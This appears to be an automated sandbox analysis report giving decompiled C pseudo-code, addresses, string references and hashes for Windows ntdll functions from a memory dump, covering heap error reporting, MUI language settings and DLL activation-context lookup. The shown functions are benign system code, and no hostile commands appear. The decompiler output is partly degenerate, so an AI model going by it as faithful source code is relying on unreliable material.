                                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                            • API String ID: 0-108210295
                                                            • Opcode ID: 25e775b97c1be21e2d5c8e67af58cd3790de7cf250ac19dd0b49a7bf20b1a029
                                                            • Instruction ID: 2a638ba4d6c96480741bb1ae0ce68c547315659cb19bfc5a0ac9e80a84521f5b
                                                            • Opcode Fuzzy Hash: 25e775b97c1be21e2d5c8e67af58cd3790de7cf250ac19dd0b49a7bf20b1a029
                                                            • Instruction Fuzzy Hash: 5F810235A50204FFEB356A4A8C85EEB7F3AEF56B9DF410048F9052B116D369A441CBB2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01381C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 44%
                                                            			E01381C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x12a48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E012CB150();
				} else {
					E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x13b589c);
				E012CB150("Heap error detected at %p (heap handle %p)\n",  *0x13b58a0);
				_t27 =  *0x13b5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01381E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E012CB150();
				} else {
					E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E012CB150("Error code: %d - %s\n",  *0x13b5898);
				_t113 =  *0x13b58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E012CB150();
					} else {
						E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E012CB150("Parameter1: %p\n",  *0x13b58a4);
				}
				_t115 =  *0x13b58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E012CB150();
					} else {
						E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E012CB150("Parameter2: %p\n",  *0x13b58a8);
				}
				_t117 =  *0x13b58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E012CB150();
					} else {
						E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E012CB150("Parameter3: %p\n",  *0x13b58ac);
				}
				_t119 =  *0x13b58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E012CB150();
					} else {
						E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x13b58b4);
					E012CB150("Last known valid blocks: before - %p, after - %p\n",  *0x13b58b0);
				} else {
					_t120 =  *0x13b58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E012CB150();
				} else {
					E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E012CB150("Stack trace available at %p\n", 0x13b58c0);
			}











                                                            0x01381c10
                                                            0x01381c16
                                                            0x01381c1e
                                                            0x01381c3d
                                                            0x01381c3e
                                                            0x01381c20
                                                            0x01381c35
                                                            0x01381c3a
                                                            0x01381c44
                                                            0x01381c55
                                                            0x01381c5a
                                                            0x01381c65
                                                            0x01381c67
                                                            0x00000000
                                                            0x01381c6e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x01381c67
                                                            0x01381cdc
                                                            0x01381ce5
                                                            0x01381d04
                                                            0x01381d05
                                                            0x01381ce7
                                                            0x01381cfc
                                                            0x01381d01
                                                            0x01381d0b
                                                            0x01381d17
                                                            0x01381d1f
                                                            0x01381d25
                                                            0x01381d30
                                                            0x01381d4f
                                                            0x01381d50
                                                            0x01381d32
                                                            0x01381d47
                                                            0x01381d4c
                                                            0x01381d61
                                                            0x01381d67
                                                            0x01381d68
                                                            0x01381d6e
                                                            0x01381d79
                                                            0x01381d98
                                                            0x01381d99
                                                            0x01381d7b
                                                            0x01381d90
                                                            0x01381d95
                                                            0x01381daa
                                                            0x01381db0
                                                            0x01381db1
                                                            0x01381db7
                                                            0x01381dc2
                                                            0x01381de1
                                                            0x01381de2
                                                            0x01381dc4
                                                            0x01381dd9
                                                            0x01381dde
                                                            0x01381df3
                                                            0x01381df9
                                                            0x01381dfa
                                                            0x01381e00
                                                            0x01381e0a
                                                            0x01381e13
                                                            0x01381e32
                                                            0x01381e33
                                                            0x01381e15
                                                            0x01381e2a
                                                            0x01381e2f
                                                            0x01381e39
                                                            0x01381e4a
                                                            0x01381e02
                                                            0x01381e02
                                                            0x01381e08
                                                            0x00000000
                                                            0x00000000
                                                            0x01381e08
                                                            0x01381e5b
                                                            0x01381e7a
                                                            0x01381e7b
                                                            0x01381e5d
                                                            0x01381e72
                                                            0x01381e77
                                                            0x01381e95

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                            • API String ID: 0-2897834094
                                                            • Opcode ID: d8ee49fcc84b3ef58e1b133aa13f1779603173d00a5ebef451cae248867c7b5e
                                                            • Instruction ID: 5b02b6fee8124c9dec4e034e6b1c95ae600a4bfb2a28bb758030eae57f646c79
                                                            • Opcode Fuzzy Hash: d8ee49fcc84b3ef58e1b133aa13f1779603173d00a5ebef451cae248867c7b5e
                                                            • Instruction Fuzzy Hash: C861E733631249DFD611BB49D4C5E7477BCEB04FB4B0A806EF60E9B701D6649C468B0A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012D3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 96%
                                                            			E012D3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E012D1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E012D1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E012D1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E012D1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E012D1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L012E4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0130F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01311370(_t276, 0x12a4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0130BB40(0,  &_v68, _t170);
									if(L012D43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0130BB40(_t257,  &_v68, _t243);
								if(L012D43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01311370(_t278, 0x12a4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L012E4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0130F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01311370(_v16, 0x12a4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0130BB40(_t262,  &_v68, _t244);
								if(L012D43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01311370(_t282, 0x12a4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0130BB40(_t262,  &_v68, _t201);
							if(L012D43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L012E4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0130F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01311370(_t280, 0x12a4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0130BB40(_t267,  &_v68, _t245);
							if(L012D43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01311370(_t284, 0x12a4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0130BB40(_t267,  &_v68, _t224);
						if(L012D43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                            0x012d3d3c
                                                            0x012d3d42
                                                            0x012d3d44
                                                            0x012d3d46
                                                            0x012d3d49
                                                            0x012d3d4c
                                                            0x012d3d4f
                                                            0x012d3d52
                                                            0x012d3d55
                                                            0x012d3d58
                                                            0x012d3d5b
                                                            0x012d3d5f
                                                            0x012d3d61
                                                            0x012d3d66
                                                            0x01328213
                                                            0x01328218
                                                            0x012d4085
                                                            0x012d4088
                                                            0x012d408e
                                                            0x012d4094
                                                            0x012d409a
                                                            0x012d40a0
                                                            0x012d40a6
                                                            0x012d40a9
                                                            0x012d40af
                                                            0x012d40b6
                                                            0x012d40bd
                                                            0x012d40bd
                                                            0x012d3d83
                                                            0x0132821f
                                                            0x01328229
                                                            0x01328238
                                                            0x01328238
                                                            0x0132823d
                                                            0x0132823d
                                                            0x012d3da0
                                                            0x012d3daf
                                                            0x012d3db5
                                                            0x012d3dba
                                                            0x012d3dba
                                                            0x012d3dd4
                                                            0x012d3e94
                                                            0x012d3eab
                                                            0x012d3f6d
                                                            0x012d3f84
                                                            0x012d406b
                                                            0x012d406b
                                                            0x012d406e
                                                            0x012d406e
                                                            0x012d4070
                                                            0x012d4074
                                                            0x01328351
                                                            0x01328351
                                                            0x012d407a
                                                            0x012d407f
                                                            0x0132835d
                                                            0x01328370
                                                            0x01328377
                                                            0x01328379
                                                            0x0132837c
                                                            0x0132837c
                                                            0x0132835d
                                                            0x00000000
                                                            0x012d407f
                                                            0x012d3f8a
                                                            0x012d3f8d
                                                            0x012d3f90
                                                            0x012d3f95
                                                            0x0132830d
                                                            0x0132830f
                                                            0x012d3f9b
                                                            0x012d3fac
                                                            0x012d3fae
                                                            0x012d3fb1
                                                            0x012d3fb1
                                                            0x012d3fb6
                                                            0x01328317
                                                            0x0132831a
                                                            0x00000000
                                                            0x012d3fbc
                                                            0x012d3fc1
                                                            0x012d3fc9
                                                            0x012d3fd7
                                                            0x012d3fda
                                                            0x012d3fdd
                                                            0x012d4021
                                                            0x012d4021
                                                            0x012d4029
                                                            0x012d4030
                                                            0x012d4044
                                                            0x012d4046
                                                            0x012d4046
                                                            0x012d4044
                                                            0x012d4049
                                                            0x01328327
                                                            0x01328334
                                                            0x01328339
                                                            0x0132833c
                                                            0x012d404f
                                                            0x012d404f
                                                            0x012d404f
                                                            0x012d4051
                                                            0x012d4056
                                                            0x012d4063
                                                            0x012d4063
                                                            0x012d4068
                                                            0x00000000
                                                            0x012d4068
                                                            0x012d3fdf
                                                            0x012d3fe2
                                                            0x012d3fe4
                                                            0x012d3fe7
                                                            0x012d3fef
                                                            0x012d4003
                                                            0x012d4005
                                                            0x012d4005
                                                            0x012d400c
                                                            0x012d4013
                                                            0x012d4016
                                                            0x012d4017
                                                            0x012d401b
                                                            0x012d401e
                                                            0x00000000
                                                            0x012d401e
                                                            0x012d3fb6
                                                            0x012d3eb1
                                                            0x012d3eb4
                                                            0x012d3eb7
                                                            0x012d3ebc
                                                            0x013282a9
                                                            0x013282ab
                                                            0x012d3ec2
                                                            0x012d3ed3
                                                            0x012d3ed5
                                                            0x012d3ed8
                                                            0x012d3ed8
                                                            0x012d3edd
                                                            0x013282b3
                                                            0x013282b6
                                                            0x00000000
                                                            0x012d3ee3
                                                            0x012d3ee8
                                                            0x012d3eed
                                                            0x012d3ef0
                                                            0x012d3ef3
                                                            0x012d3f02
                                                            0x012d3f05
                                                            0x012d3f08
                                                            0x013282c0
                                                            0x013282c3
                                                            0x013282c5
                                                            0x013282c8
                                                            0x013282d0
                                                            0x013282e4
                                                            0x013282e6
                                                            0x013282e6
                                                            0x013282ed
                                                            0x013282f4
                                                            0x013282f7
                                                            0x013282f8
                                                            0x013282fc
                                                            0x013282ff
                                                            0x013282ff
                                                            0x012d3f0e
                                                            0x012d3f11
                                                            0x012d3f16
                                                            0x012d3f1d
                                                            0x012d3f31
                                                            0x01328307
                                                            0x01328307
                                                            0x012d3f31
                                                            0x012d3f39
                                                            0x012d3f48
                                                            0x012d3f4d
                                                            0x012d3f50
                                                            0x012d3f50
                                                            0x012d3f53
                                                            0x012d3f58
                                                            0x012d3f65
                                                            0x012d3f65
                                                            0x012d3f6a
                                                            0x00000000
                                                            0x012d3f6a
                                                            0x012d3edd
                                                            0x012d3dda
                                                            0x012d3ddd
                                                            0x012d3de0
                                                            0x012d3de5
                                                            0x01328245
                                                            0x012d3deb
                                                            0x012d3df7
                                                            0x012d3dfc
                                                            0x012d3dfe
                                                            0x012d3e01
                                                            0x012d3e01
                                                            0x012d3e06
                                                            0x0132824d
                                                            0x0132824f
                                                            0x01328254
                                                            0x00000000
                                                            0x012d3e0c
                                                            0x012d3e11
                                                            0x012d3e16
                                                            0x012d3e19
                                                            0x012d3e29
                                                            0x012d3e2c
                                                            0x012d3e2f
                                                            0x0132825c
                                                            0x0132825f
                                                            0x01328261
                                                            0x01328264
                                                            0x0132826c
                                                            0x01328280
                                                            0x01328282
                                                            0x01328282
                                                            0x01328289
                                                            0x01328290
                                                            0x01328293
                                                            0x01328294
                                                            0x01328298
                                                            0x0132829b
                                                            0x0132829b
                                                            0x012d3e35
                                                            0x012d3e38
                                                            0x012d3e3d
                                                            0x012d3e44
                                                            0x012d3e58
                                                            0x013282a3
                                                            0x013282a3
                                                            0x012d3e58
                                                            0x012d3e60
                                                            0x012d3e6f
                                                            0x012d3e74
                                                            0x012d3e77
                                                            0x012d3e77
                                                            0x012d3e7a
                                                            0x012d3e7f
                                                            0x012d3e8c
                                                            0x012d3e8c
                                                            0x012d3e91
                                                            0x00000000
                                                            0x012d3e91

                                                            Strings
                                                            • WindowsExcludedProcs, xrefs: 012D3D6F
                                                            • Kernel-MUI-Number-Allowed, xrefs: 012D3D8C
                                                            • Kernel-MUI-Language-SKU, xrefs: 012D3F70
                                                            • Kernel-MUI-Language-Allowed, xrefs: 012D3DC0
                                                            • Kernel-MUI-Language-Disallowed, xrefs: 012D3E97
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                            • API String ID: 0-258546922
                                                            • Opcode ID: 17462d492c09d0aa2a2885f33dc685cf547cc290475e9329052a5986e636afcb
                                                            • Instruction ID: d707a259e16189f81723f3f130e1e135243da738a75081713d4c646b812c06f7
                                                            • Opcode Fuzzy Hash: 17462d492c09d0aa2a2885f33dc685cf547cc290475e9329052a5986e636afcb
                                                            • Instruction Fuzzy Hash: 03F15F76D20659EFCB15EF98C980AEEBBF9FF08650F14006AE605E7650D7749E01CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012F8E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 44%
                                                            			E012F8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x13bd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x13b8464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x13b5780 & 0x00000003) != 0) {
							E01345510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x13b5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0130B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x13b7984; // 0xd02ba0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x13b8464; // 0x74790110
					 *0x13bb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E012F9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x13b5780 & 0x00000005) != 0) {
						_push(_t49);
						E01345510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                            0x012f8e0f
                                                            0x012f8e16
                                                            0x012f8e19
                                                            0x012f8e1b
                                                            0x012f8e21
                                                            0x012f8e7f
                                                            0x012f8e85
                                                            0x01339354
                                                            0x0133936c
                                                            0x01339371
                                                            0x0133937b
                                                            0x01339381
                                                            0x01339381
                                                            0x0133937b
                                                            0x012f8e9d
                                                            0x012f8e9d
                                                            0x012f8e29
                                                            0x012f8e2c
                                                            0x012f8e38
                                                            0x012f8e3e
                                                            0x012f8e43
                                                            0x012f8eb5
                                                            0x012f8eb9
                                                            0x013392aa
                                                            0x013392af
                                                            0x013392e8
                                                            0x013392e8
                                                            0x013392af
                                                            0x012f8eb9
                                                            0x012f8e45
                                                            0x012f8e53
                                                            0x012f8e5b
                                                            0x012f8e5f
                                                            0x012f8e78
                                                            0x012f8e78
                                                            0x012f8e7d
                                                            0x012f8ec3
                                                            0x012f8ecd
                                                            0x012f8ed2
                                                            0x012f8ed2
                                                            0x012f8ec5
                                                            0x012f8ec5
                                                            0x00000000
                                                            0x012f8e7d
                                                            0x012f8e67
                                                            0x012f8ea4
                                                            0x0133931a
                                                            0x00000000
                                                            0x00000000
                                                            0x01339320
                                                            0x012f8ea4
                                                            0x012f8e70
                                                            0x01339325
                                                            0x01339340
                                                            0x01339345
                                                            0x01339345
                                                            0x012f8e76
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            Strings
                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0133932A
                                                            • LdrpFindDllActivationContext, xrefs: 01339331, 0133935D
                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 01339357
                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 0133933B, 01339367
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                            • API String ID: 0-3779518884
                                                            • Opcode ID: 871d9ecb6a0fc3fca05494aa61fdb818e96ad5107b07b057004cd9500e823bb2
                                                            • Instruction ID: 50700f20438361e120f651ecf0230d623be258a1edf9c68af96a679a706af892
                                                            • Opcode Fuzzy Hash: 871d9ecb6a0fc3fca05494aa61fdb818e96ad5107b07b057004cd9500e823bb2
                                                            • Instruction Fuzzy Hash: 53410932A30316DFEB36AE1C8C89B79F7A8AB44358F06417DFB5457152E7B05C808781
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012D8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 83%
                                                            			E012D8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
